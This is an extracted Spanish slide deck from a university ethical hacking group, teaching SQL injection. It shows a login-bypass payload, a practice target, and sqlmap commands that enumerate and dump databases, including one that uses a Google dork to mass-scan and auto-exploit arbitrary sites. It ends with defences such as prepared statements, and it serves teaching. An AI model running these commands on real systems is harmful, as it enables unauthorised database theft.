SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend...
Transcript of SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend...
![Page 1: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with](https://reader033.fdocuments.net/reader033/viewer/2022042123/5e9e9ab3e42f2003c9601e44/html5/thumbnails/1.jpg)
HACKING WEB
SQL Injection
FDIst: Grupo de Hacking Ético de la FDI
![Page 2: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with](https://reader033.fdocuments.net/reader033/viewer/2022042123/5e9e9ab3e42f2003c9601e44/html5/thumbnails/2.jpg)
FD
Ist
- H
AC
KIN
G W
EB
SQ
L IN
JEC
TIO
N
![Page 3: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with](https://reader033.fdocuments.net/reader033/viewer/2022042123/5e9e9ab3e42f2003c9601e44/html5/thumbnails/3.jpg)
DISCLAIMERF
DIs
t -
HA
CK
ING
WE
BS
QL
INJE
CT
ION
In no event will we be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the knowledge provided.
![Page 4: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with](https://reader033.fdocuments.net/reader033/viewer/2022042123/5e9e9ab3e42f2003c9601e44/html5/thumbnails/4.jpg)
¿Qué es?F
DIs
t -
HA
CK
ING
WE
BS
QL
INJE
CT
ION
![Page 5: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with](https://reader033.fdocuments.net/reader033/viewer/2022042123/5e9e9ab3e42f2003c9601e44/html5/thumbnails/5.jpg)
La magia de SQL InjectionF
DIs
t -
HA
CK
ING
WE
BS
QL
INJE
CT
ION
' OR 1 = 1; --
![Page 6: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with](https://reader033.fdocuments.net/reader033/viewer/2022042123/5e9e9ab3e42f2003c9601e44/html5/thumbnails/6.jpg)
La magia de SQL InjectionF
DIs
t -
HA
CK
ING
WE
BS
QL
INJE
CT
ION
![Page 7: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with](https://reader033.fdocuments.net/reader033/viewer/2022042123/5e9e9ab3e42f2003c9601e44/html5/thumbnails/7.jpg)
¡Atacad!
https://vulnerable.devpgsv.com/
FD
Ist
- H
AC
KIN
G W
EB
SQ
L IN
JEC
TIO
N
![Page 8: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with](https://reader033.fdocuments.net/reader033/viewer/2022042123/5e9e9ab3e42f2003c9601e44/html5/thumbnails/8.jpg)
Automatizando
● SQLNinja● The Mole● SQLBrute● SQLMap
FD
Ist
- H
AC
KIN
G W
EB
SQ
L IN
JEC
TIO
N
![Page 9: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with](https://reader033.fdocuments.net/reader033/viewer/2022042123/5e9e9ab3e42f2003c9601e44/html5/thumbnails/9.jpg)
SQLMap
sqlmap -u [URL]
sqlmap -u [URL] --dbs
sqlmap -u [URL] -D [DATABASE] --tables
sqlmap -u [URL] -D [DATABASE] -t [TABLE] --columns
sqlmap -u [URL] -D [DATABASE] -t [TABLE] --dump
FD
Ist
- H
AC
KIN
G W
EB
SQ
L IN
JEC
TIO
N
![Page 10: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with](https://reader033.fdocuments.net/reader033/viewer/2022042123/5e9e9ab3e42f2003c9601e44/html5/thumbnails/10.jpg)
SQLMap
sqlmap -g 'inurl:".php?id="' --dbs --dump-all --exclude-sysdbs --answers="follow=N, want to skip test payloads specific for other DBMSes=Y, want to include all tests for 'MySQL'=N,do you want to test this URL=Y,is vulnerable. Do you want to keep testing the others=N,want to exploit this SQL injection=Y,store hashes to a temporary file=N,crack them via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with a random integer value for option=Y,due to huge table size do you want to remove ORDER BY clause gaining speed over consistency=Y" --threads=10
FD
Ist
- H
AC
KIN
G W
EB
SQ
L IN
JEC
TIO
N
![Page 11: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with](https://reader033.fdocuments.net/reader033/viewer/2022042123/5e9e9ab3e42f2003c9601e44/html5/thumbnails/11.jpg)
Database InjectionF
DIs
t -
HA
CK
ING
WE
BS
QL
INJE
CT
ION
![Page 12: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with](https://reader033.fdocuments.net/reader033/viewer/2022042123/5e9e9ab3e42f2003c9601e44/html5/thumbnails/12.jpg)
SoluciónF
DIs
t -
HA
CK
ING
WE
BS
QL
INJE
CT
ION
● Escapar caracteres● Filtros● Prepared Statements
![Page 13: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with](https://reader033.fdocuments.net/reader033/viewer/2022042123/5e9e9ab3e42f2003c9601e44/html5/thumbnails/13.jpg)
FDIst
@FDIstUCM
https://t.me/joinchat/Ar4agkCACYELE5TZ5AWtAA
https://fdist.fdi.ucm.es
FD
Ist
- H
AC
KIN
G W
EB
SQ
L IN
JEC
TIO
N
![Page 14: SQL Injection - UCM · via a dictionary-based attack=N,do you want sqlmap to try to detect backend WAF/IPS/IDS=N,injection not exploitable with NULL values. Do you want to try with](https://reader033.fdocuments.net/reader033/viewer/2022042123/5e9e9ab3e42f2003c9601e44/html5/thumbnails/14.jpg)
This work is licensed under a
Creative Commons Attribution-ShareAlike 4.0 International License
.
Pablo García de los Salmones ValenciaFebrero 2018
FD
Ist
- H
AC
KIN
G W
EB
SQ
L IN
JEC
TIO
N